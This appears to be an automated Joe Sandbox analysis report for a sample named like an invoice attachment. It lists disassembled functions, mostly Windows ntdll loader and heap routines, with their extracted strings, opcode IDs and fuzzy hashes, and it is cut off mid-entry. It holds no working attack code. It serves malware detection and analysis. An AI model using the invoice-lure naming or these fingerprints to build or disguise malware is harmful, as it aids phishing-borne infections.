                                            • Opcode ID: 64133d5afe229f58a90e4bce5767fc890f7927b12f22d10389645a74c0dc036d
                                            • Instruction ID: ab1b0996d6724857b89d7bfc08a15ecd0b5f4564edc1e0f1835f2d6a5c31ecfe
                                            • Opcode Fuzzy Hash: 64133d5afe229f58a90e4bce5767fc890f7927b12f22d10389645a74c0dc036d
                                            • Instruction Fuzzy Hash: 80818AB1A00358EFDB64CF99CC45BAEBBF9AB08B04F10815EF684BB650D771A940CB50
                                            Function 010B29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010F24C0
                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 010F2602
                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 010F2624
                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010F25EB
                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 010F2506
                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 010F2409
                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 010F2412
                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010F22E4
                                            • @, xrefs: 010F259B
                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 010F261F
                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 010F2498
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                            • API String ID: 0-4009184096
                                            • Opcode ID: 4c7930b21970797df01ed444c718ffc4aa3a733924bff07c8626ce9138ef1404
                                            • Instruction ID: bf04e3af72d7e40cbe986e231bd80f79371a469778304ce23eb9eea230c7f162
                                            • Opcode Fuzzy Hash: 4c7930b21970797df01ed444c718ffc4aa3a733924bff07c8626ce9138ef1404
                                            • Instruction Fuzzy Hash: 83026EF1D002299BDB71DB54CC81BDEB7B8AB54704F4041EAA789A7241EB70AE84CF59
                                            Function 01128B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                            • API String ID: 0-2515994595
                                            • Opcode ID: 3f2d02a8a7f78a3348f7e5a0dcb104897523417290934ebb92bf4825da69d60e
                                            • Instruction ID: 3b3ae56b2171c6d05dc4b54410748bdcfcfaa77937d406f97149fda41c655773
                                            • Opcode Fuzzy Hash: 3f2d02a8a7f78a3348f7e5a0dcb104897523417290934ebb92bf4825da69d60e
                                            • Instruction Fuzzy Hash: E351CD715083269BC32DDF18C884BEBBBE8FF94650F54492DE999C7241E770D628CB92
                                            Function 01130274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 0-1700792311
                                            • Opcode ID: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
                                            • Instruction ID: 494d5db2ffc24d4e2d7a81991c1df92dd9c0bb7714e893555f7f091897574f1f
                                            • Opcode Fuzzy Hash: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
                                            • Instruction Fuzzy Hash: 6ED1EF31A00686DFDB2ADF68C840AAEFBF1FF8A710F198059F4959B656C7349981CB14
                                            Function 011089B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                            Download Yara Rule
                                            Strings
                                            • HandleTraces, xrefs: 01108C8F
                                            • VerifierDebug, xrefs: 01108CA5
                                            • VerifierFlags, xrefs: 01108C50
                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01108A67
                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01108A3D
                                            • AVRF: -*- final list of providers -*- , xrefs: 01108B8F
                                            • VerifierDlls, xrefs: 01108CBD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                            • API String ID: 0-3223716464
                                            • Opcode ID: 7e4ff79b69a41672371d85402e4d2234c0d1c160875ebb9c14be3d703d93d81d
                                            • Instruction ID: c0392e375d879ddb10ba7c11b5f38d988397c61c1101779f7456da48fa395622
                                            • Opcode Fuzzy Hash: 7e4ff79b69a41672371d85402e4d2234c0d1c160875ebb9c14be3d703d93d81d
                                            • Instruction Fuzzy Hash: 0E915771E08716EFD72FEF288880B9A7BB5AB54714F054528FA85AB3C1C7B09C41CB91
                                            Function 0108EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                            • API String ID: 0-1109411897
                                            • Opcode ID: 4ee58d7c493940c46bdbba0c34cff8eb5f35e55cd2b8af5bbe99cfc9c90ca3e8
                                            • Instruction ID: 685195467688fafe1d2c6cfe56e4c693bb71a8d3b774814fb51a606a53d52691
                                            • Opcode Fuzzy Hash: 4ee58d7c493940c46bdbba0c34cff8eb5f35e55cd2b8af5bbe99cfc9c90ca3e8
                                            • Instruction Fuzzy Hash: 15A23A74A0962A8FDB64EF29C8887ADBBF5BF45304F1442E9D589E7250DB309E85CF40
                                            Function 010B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            • Opcode ID: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
                                            • Instruction ID: feb53cec4fa3473b9beca9dadda0cf3fdb00662887f157bc39afcd49c63d61ef
                                            • Opcode Fuzzy Hash: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
                                            • Instruction Fuzzy Hash: 77912830A017159BEB69DF18D885BEE7BB5BF40B14F04017CEA90AB781DB799841CB91
                                            Function 0107645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                            Download Yara Rule
                                            Strings
                                            • Loading the shim user DLL failed with status 0x%08lx, xrefs: 010D9A2A
                                            • LdrpInitShimEngine, xrefs: 010D99F4, 010D9A07, 010D9A30
                                            • apphelp.dll, xrefs: 01076496
                                            • Getting the shim user exports failed with status 0x%08lx, xrefs: 010D9A01
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010D9A11, 010D9A3A
                                            • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 010D99ED
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            • Opcode ID: bc0f8a5f6a5a2705aa404860e0543fce389e266fccfcada958f4cc3ab55a665e
                                            • Instruction ID: 23270b7a567e93ae0e984c4b7beaff2064026ab67ca7a64a1550692b627b8d19
                                            • Opcode Fuzzy Hash: bc0f8a5f6a5a2705aa404860e0543fce389e266fccfcada958f4cc3ab55a665e
                                            • Instruction Fuzzy Hash: FD51C0716187059FE724DF28C881AABB7E8FB84748F00092DF5D69B260D731E944DB97
                                            Function 010B2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() passed the empty activation context, xrefs: 010F2165
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010F21BF
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 010F219F
                                            • RtlGetAssemblyStorageRoot, xrefs: 010F2160, 010F219A, 010F21BA
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 010F2180
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 010F2178
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            • Opcode ID: 8dbc8eacefdbafde9533e858d3403eba493bb3d35263c450e4ffd9fc2e855960
                                            • Instruction ID: 1d20e0fcd63e00a5ed1b6682c14856d2f648c1ca5fb5e20027c48f66762603f2
                                            • Opcode Fuzzy Hash: 8dbc8eacefdbafde9533e858d3403eba493bb3d35263c450e4ffd9fc2e855960
                                            • Instruction Fuzzy Hash: 8831FB36F802157BE7218A998C86F9F7BB8FBA5A94F05005DBB847B140D370EE01C7A5
                                            Function 010BC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpInitializeProcess, xrefs: 010BC6C4
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 010F8181, 010F81F5
                                            • Loading import redirection DLL: '%wZ', xrefs: 010F8170
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 010F81E5
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010BC6C3
                                            • LdrpInitializeImportRedirection, xrefs: 010F8177, 010F81EB
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            • Opcode ID: 2657b2f4a306bc05d352b4d8a64a954144699b4b0de62f726418865bf2608cc1
                                            • Instruction ID: a5ee5457e4637c61dc0809d0f2c79e0753dfec11a3ddc97209a491273c6c5cbe
                                            • Opcode Fuzzy Hash: 2657b2f4a306bc05d352b4d8a64a954144699b4b0de62f726418865bf2608cc1
                                            • Instruction Fuzzy Hash: B031E4717447069BD324EF68DD86E9A77E8BF94B10F04456CF9C5AB291E720EC04CBA2
                                            Function 010C096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 010C2DF0: LdrInitializeThunk.NTDLL ref: 010C2DFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0BA3
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0BB6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0D60
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0D74
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                            • String ID:
                                            • API String ID: 1404860816-0
                                            • Opcode ID: 4ba7e4f3859c8427b081a782587845d5bc91a10e0ec90700ee17fdc07f59dc33
                                            • Instruction ID: 8bcdc3419e843ccd7991985c212645fb736dad04248e38bfc40368a80b6e7124
                                            • Opcode Fuzzy Hash: 4ba7e4f3859c8427b081a782587845d5bc91a10e0ec90700ee17fdc07f59dc33
                                            • Instruction Fuzzy Hash: C9426B75900705DFDB61CF68C881BAAB7F4BF04704F1485ADEA89EB645D770AA84CF60
                                            Function 00407B1A Relevance: 6.4, Strings: 5, Instructions: 112COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: C$a$b$d$i
                                            • API String ID: 0-2334916691
                                            • Opcode ID: 2b754916aa3a92f91c659b453915a5d92106502f957d0b9510b451a8bb427196
                                            • Instruction ID: 9583609b8f3fd2681d42c196dc10633e9a7d86d3d503d0f9cd7b1e27dadaadae
                                            • Opcode Fuzzy Hash: 2b754916aa3a92f91c659b453915a5d92106502f957d0b9510b451a8bb427196
                                            • Instruction Fuzzy Hash: 1A31D0B2E04208ABE714DFA5DC82BEEB7B9EF45308F00851EF509A7241D779694187A9
                                            Function 0108A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            • Opcode ID: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
                                            • Instruction ID: 9c4ba23efa58783345d96fea5747c7d8285d7fd0b62eb01fe1b139ab15d6f5c0
                                            • Opcode Fuzzy Hash: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
                                            • Instruction Fuzzy Hash: 90C18B7460C386CFDB11EF59C044B6AB7E4BF88704F04496AF9D58BA51E738CA49CB62
                                            Function 010B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpInitializeProcess, xrefs: 010B8422
                                            • @, xrefs: 010B8591
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010B855E
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010B8421
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
                                            • Instruction ID: 0e1f4432399fd8543f0e8134e25d0c5234c34b6bae10d295d7fa74ed5bc16e5a
                                            • Opcode Fuzzy Hash: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
                                            • Instruction Fuzzy Hash: 04918871508345AFD761EB25CC81FAFBAECBB88744F40492EFAC496161E734D9448B62
                                            Function 010B273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() passed the empty activation context, xrefs: 010F21DE
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010F22B6
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010F21D9, 010F22B1
                                            • .Local, xrefs: 010B28D8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: afbc0aa22bcff98bc35f1b199bfb4c42ad3a9204bec6069d9500acc6e5943386
                                            • Instruction ID: ccac4d5ab8554cabd6301f7aff8b44a1e6559c0934b3bd61e6ad89b28b591f00
                                            • Opcode Fuzzy Hash: afbc0aa22bcff98bc35f1b199bfb4c42ad3a9204bec6069d9500acc6e5943386
                                            • Instruction Fuzzy Hash: FDA1BF3590022A9BDB65CF68C8C4BE9B7B0BF58354F1541EAD988AB251D730EE81CF94
                                            Function 010864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                            Download Yara Rule
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 010E1028
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 010E0FE5
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010E10AE
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 010E106B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
                                            • Instruction ID: c379ca71bd00ea4648c99ff449b635a176e1b912d1bc208ae837d59533b6eb90
                                            • Opcode Fuzzy Hash: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
                                            • Instruction Fuzzy Hash: 5971BFB19083059FCB61EF14C885B9B7FE8AF54764F400469F9C88B286D775D588CBE2
                                            Function 010A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpDynamicShimModule, xrefs: 010EA998
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 010EA992
                                            • apphelp.dll, xrefs: 010A2462
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010EA9A2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
                                            • Instruction ID: 5d5e77afc3d5dcc0cd6da5f23007c19374eb795a701f4ee1f1ccfc45b20f4c7f
                                            • Opcode Fuzzy Hash: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
                                            • Instruction Fuzzy Hash: EB312A75B10301EFDB399F9AD845AAEB7F5FB88714F160069E9A1AB345C7705881CB80
                                            Function 010929A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                            Download Yara Rule
                                            Strings
                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0109327D
                                            • HEAP[%wZ]: , xrefs: 01093255
                                            • HEAP: , xrefs: 01093264
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                            • API String ID: 0-617086771
                                            • Opcode ID: 94a6deed2b53922d4d349e97ec59ef140a1ce04f48915e7019f5239cab946f64
                                            • Instruction ID: c3558662539bfd90d900e333a9deb6e868b3e177416a8371f007535a99096475
                                            • Opcode Fuzzy Hash: 94a6deed2b53922d4d349e97ec59ef140a1ce04f48915e7019f5239cab946f64
                                            • Instruction Fuzzy Hash: 9992BC71A042499FDF65CFA8C4607AEBBF1FF48304F1880A9E899AB391D735A941DF50
                                            Function 01090770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: a301d8f8e93120640a1054b73cd440ca531f19871d9933f51e65f2768de7bc1d
                                            • Instruction ID: 86943306984ce0330008b309e997c1bc06ae20c1553adac62872a34aa71da9de
                                            • Opcode Fuzzy Hash: a301d8f8e93120640a1054b73cd440ca531f19871d9933f51e65f2768de7bc1d
                                            • Instruction Fuzzy Hash: B4F1CC34B00606DFEB15CF69C8A4B6EB7F9FB45308F1485A8E4969B385D734E981CB90
                                            Function 010A6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: $@
                                            • API String ID: 2994545307-1077428164
                                            • Opcode ID: 3eaab2b434405b4f281c32c21a0b7b7914348906aa722836b19860806db2d87b
                                            • Instruction ID: 093db1db17a2489455e67e58c94e5db114d1dbc07e77cfdbc7e1060e09124c9e
                                            • Opcode Fuzzy Hash: 3eaab2b434405b4f281c32c21a0b7b7914348906aa722836b19860806db2d87b
                                            • Instruction Fuzzy Hash: EBC2AC716083419FEB65CF69C880BABBBE5BF88704F44896DE9C987241D736D805CB92
                                            Function 0107A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            • Opcode ID: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
                                            • Instruction ID: 6a833ef558fd94124f904367213ef3d920eceafcb7bf87f6e61da8895abe3392
                                            • Opcode Fuzzy Hash: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
                                            • Instruction Fuzzy Hash: A4A179719012299BEB319F68CD88BEEB7B8FF44710F0041EAE949A7250DB359E85CF54
                                            Function 010A0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                            Download Yara Rule
                                            Strings
                                            • Failed to allocated memory for shimmed module list, xrefs: 010EA10F
                                            • LdrpCheckModule, xrefs: 010EA117
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010EA121
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-161242083
                                            • Opcode ID: 92917d899fa265aee025d4e75790662f9783ca0b0e8cd39ecc60b662058aed37
